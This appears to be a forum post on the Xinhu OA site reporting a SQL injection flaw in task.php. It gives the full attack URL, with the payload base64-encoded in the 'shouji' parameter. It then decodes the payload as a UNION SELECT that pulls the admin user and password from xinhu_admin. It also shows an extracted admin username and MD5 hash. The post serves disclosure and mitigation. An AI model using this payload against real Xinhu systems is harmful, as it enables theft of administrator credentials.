根据系统日志今天发现一个安全漏洞,对方通过:https://xxxx.com/task.php?m=login%7capi&a=setwxqy&callback=cb&num=1&agentid=1&shouji=jybvtklptibtruxfq1qgtlvmtcxovuxmlenptknbvch1c2vyldb4n2m3yyxwyxnzksxovuxmle5vtewstlvmtcwxle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmle5vtewstlvmtcxovuxmiezst00gegluahvfywrtaw4gv0hfukugdhlwzt0xiexjtuluidegt0zgu0vuidatlsat&userid=ea==
方式攻击,可以查到管理账号信息。shouji=后面的内容是通过base64加密,解密出来的内容是:' union null,null,concat(user,0x7c7c,pass),null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from xinhu_admin where type=1 limit 1 offset 0-- -ǫ
如果你的管理员或用户表是xinhu_前缀的,数据直接被查询出来。
我进行测试得出的数据是:cb({"msg":"","code":200,"success":true,"data":{"user":"admin||63449778365a59c7f45de1295099397fa"}})
密码是md5加密的,大家都知道md5是可以解密的。
所以大家的表前缀最好是修改成其他字符,管理员admin账号用其他其他代替。或者官方修复这个漏洞。
[img,{fileurl}/img/65379.png,700]
[img,{fileurl}/img/37872.png]
[img,{fileurl}/img/62066.png,700]
原创文章,禁止转载复制,信呼OA官网保留一切知识产权。
1楼 官网、 (2026-05-06 18:15:45)
2楼 VIP、 (2026-05-06 18:21:37)